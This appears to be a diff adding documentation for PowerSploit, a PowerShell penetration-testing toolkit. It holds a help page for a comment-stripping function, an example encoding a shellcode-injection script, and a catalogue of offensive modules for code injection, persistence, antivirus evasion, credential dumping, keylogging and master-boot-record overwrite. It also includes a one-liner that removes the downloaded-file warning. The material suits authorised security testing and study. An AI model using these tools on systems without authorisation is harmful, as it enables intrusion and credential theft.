+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$Stripped = Remove-Comment -Path .\ScriptWithComments.ps1
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Remove-Comment -ScriptBlock {
+```
+
+### This is my awesome script.
+My documentation is beyond reproach!
+ Write-Host 'Hello, World!' ### Write 'Hello, World' to the host
+### End script awesomeness
+}
+
+Write-Host 'Hello, World!'
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Remove-Comment -Path Inject-Shellcode.ps1 | Out-EncodedCommand
+```
+
+Description
+-----------
+Removes extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand.
+
+## PARAMETERS
+
+### -Path
+Specifies the path to your script.
+
+```yaml
+Type: String
+Parameter Sets: FilePath
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ScriptBlock
+Specifies a scriptblock containing your script.
+
+```yaml
+Type: ScriptBlock
+Parameter Sets: ScriptBlock
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### System.String, System.Management.Automation.ScriptBlock
+
+Accepts either a string containing the path to a script or a scriptblock.
+
+## OUTPUTS
+
+### System.Management.Automation.ScriptBlock
+
+Remove-Comment returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com
+http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/]()
+
diff --git a/docs/index.md b/docs/index.md new file mode 100644 index 0000000..9c001da --- /dev/null +++ b/docs/index.md @@ -0,0 +1,150 @@ +## Overview +PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. + +### CodeExecution +Execute code on a target machine. + + Invoke-DllInjection - Injects a Dll into the process ID of your choosing. + Invoke-ReflectivePEInjection - Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. + Invoke-Shellcode - Injects shellcode into the process ID of your choosing or within PowerShell locally. + Invoke-WmiCommand - Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel + +### ScriptModification +Modify and/or prepare scripts for execution on a compromised machine. + + Out-EncodedCommand - Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. + Out-CompressedDll - Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. + Out-EncryptedScript - Encrypts text files/scripts. + Remove-Comment - Strips comments and extra whitespace from a script. + +### Persistence + +Add persistence capabilities to a PowerShell script. + + New-UserPersistenceOption - Configure user-level persistence options for the Add-Persistence function. + New-ElevatedPersistenceOption - Configure elevated persistence options for the Add-Persistence function. + Add-Persistence - Add persistence capabilities to a script. + Install-SSP - Installs a security support provider (SSP) dll. + Get-SecurityPackage - Enumerates all loaded security packages (SSPs). + +### AntivirusBypass +AV doesn't stand a chance against PowerShell! + + Find-AVSignature - Locates single Byte AV signatures utilizing the same method as DSplit from "class101". + +### Exfiltration +All your data belong to me! + + Invoke-TokenManipulation - Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread. + Invoke-CredentialInjection - Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon). + Invoke-NinjaCopy - Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. + Invoke-Mimikatz - Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz. + Get-Keystrokes - Logs keys pressed, time and the active window. + Get-GPPPassword - Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. + Get-GPPAutologon - Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences. + Get-TimedScreenshot - A function that takes screenshots at a regular interval and saves them to a folder. + New-VolumeShadowCopy - Creates a new volume shadow copy. + Get-VolumeShadowCopy - Lists the device paths of all local volume shadow copies. + Mount-VolumeShadowCopy - Mounts a volume shadow copy. + Remove-VolumeShadowCopy - Deletes a volume shadow copy. + Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials. + Out-Minidump - Generates a full-memory minidump of a process. + Get-MicrophoneAudio - Records audio from system microphone and saves to disk. + +### Mayhem +Cause general mayhem with PowerShell. + + Set-MasterBootRecord - Proof of concept code that overwrites the master boot record with the message of your choice. + Set-CriticalProcess - Causes your machine to blue screen upon exiting PowerShell. + +### Privesc +Tools to help with escalating privileges on a target, including PowerUp. + + PowerUp - Clearing house of common privilege escalation checks, along with some weaponization vectors. + Get-System - GetSystem functionality inspired by Meterpreter's getsystem + +### Recon +Tools to aid in the reconnaissance phase of a penetration test, including PowerView. + + Invoke-Portscan - Does a simple port scan using regular sockets, based (pretty) loosely on nmap. + Get-HttpStatus - Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file. + Invoke-ReverseDnsLookup - Scans an IP address range for DNS PTR records. + PowerView - PowerView is series of functions that performs network and Windows domain enumeration and exploitation. + +## License + +The PowerSploit project and all individual scripts are under the [BSD 3-Clause license](https://raw.github.com/mattifestation/PowerSploit/master/LICENSE) unless explicitly noted otherwise. + +## Usage + +Refer to the comment-based help in each individual script for detailed usage information. + +To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. + +The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" +The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" + +To use the module, type `Import-Module PowerSploit` + +To see the commands imported, type `Get-Command -Module PowerSploit` + +If you're running PowerShell v3 and you want to remove the annoying 'Do you really want to run scripts downloaded from the Internet' warning, once you've placed PowerSploit into your module path, run the following one-liner: +`$Env:PSModulePath.Split(';') | + % { if ( Test-Path (Join-Path $_ PowerSploit) ) + {Get-ChildItem $_ -Recurse | Unblock-File} }` + +For help on each individual command, Get-Help is your friend. + +Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. + +## Contribution Rules + +We need contributions! If you have a great idea for PowerSploit, we'd love to add it. New additions will require the following: + +* The script must adhere to the style guide. Any exceptions to the guide line would need an explicit, valid reason. +* The module manifest needs to be updated to reflect the new function being added. +* A brief description of the function should be added to this README.md +* Pester tests must accompany all new functions. See the Tests folder for examples but we are looking for tests that at least cover the basics by testing for expected/unexpected input/output and that the function exhibits desired functionality. Make sure the function is passing all tests (preferably in mutiple OSes) prior to submitting a pull request. Thanks! + +## Script Style Guide + +**For all contributors and future contributors to PowerSploit, I ask that you follow this style guide when writing your scripts/modules.** + +* Avoid Write-Host **at all costs**. PowerShell functions/cmdlets are not command-line utilities! Pull requests containing code that uses Write-Host will not be considered. You should output custom objects instead. For more information on creating custom objects, read these articles: + * <http://blogs.technet.com/b/heyscriptingguy/archive/2011/05/19/create-custom-objects-in-your-powershell-script.aspx> + * <http://technet.microsoft.com/en-us/library/ff730946.aspx> + +* If you want to display relevant debugging information to the screen, use Write-Verbose. The user can always just tack on '-Verbose'. + +* Always provide descriptive, comment-based help for every script. Also, be sure to include your name and a BSD 3-Clause license (unless there are extenuating circumstances that prevent the application of the BSD license). + +* Make sure all functions follow the proper PowerShell verb-noun agreement. Use Get-Verb to list the default verbs used by PowerShell. Exceptions to supported verbs will be considered on a case-by-case basis. + +* I prefer that variable names be capitalized and be as descriptive as possible. + +* Provide logical spacing in between your code. Indent your code to make it more readable. + +* If you find yourself repeating code, write a function. + +* Catch all anticipated errors and provide meaningful output. If you have an error that should stop execution of the script, use 'Throw'. If you have an error that doesn't need to stop execution, use Write-Error. + +* If you are writing a script that interfaces with the Win32 API, try to avoid compiling C# inline with Add-Type. Try to use the PSReflect module, if possible. + +* Do not use hardcoded paths. A script should be useable right out of the box. No one should have to modify the code unless they want to. + +* PowerShell v2 compatibility is highly desired. + +* Use positional parameters and make parameters mandatory when it makes sense to do so. For example, I'm looking for something like the following: + * `[Parameter(Position = 0, Mandatory = $True)]` + +* Don't use any aliases unless it makes sense for receiving pipeline input. They make code more difficult to read for people who are unfamiliar with a particular alias. + +* Try not to let commands run on for too long. For example, a pipeline is a natural place for a line break. + +* Don't go overboard with inline comments. Only use them when certain aspects of the code might be confusing to a reader. + +* Rather than using Out-Null to suppress unwanted/irrelevant output, save the unwanted output to $null. Doing so provides a slight performance enhancement. + +* Use default values for your parameters when it makes sense. Ideally, you want a script that will work without requiring any parameters. + +* If a script creates complex custom objects, include a ps1xml file that will properly format the object's output. |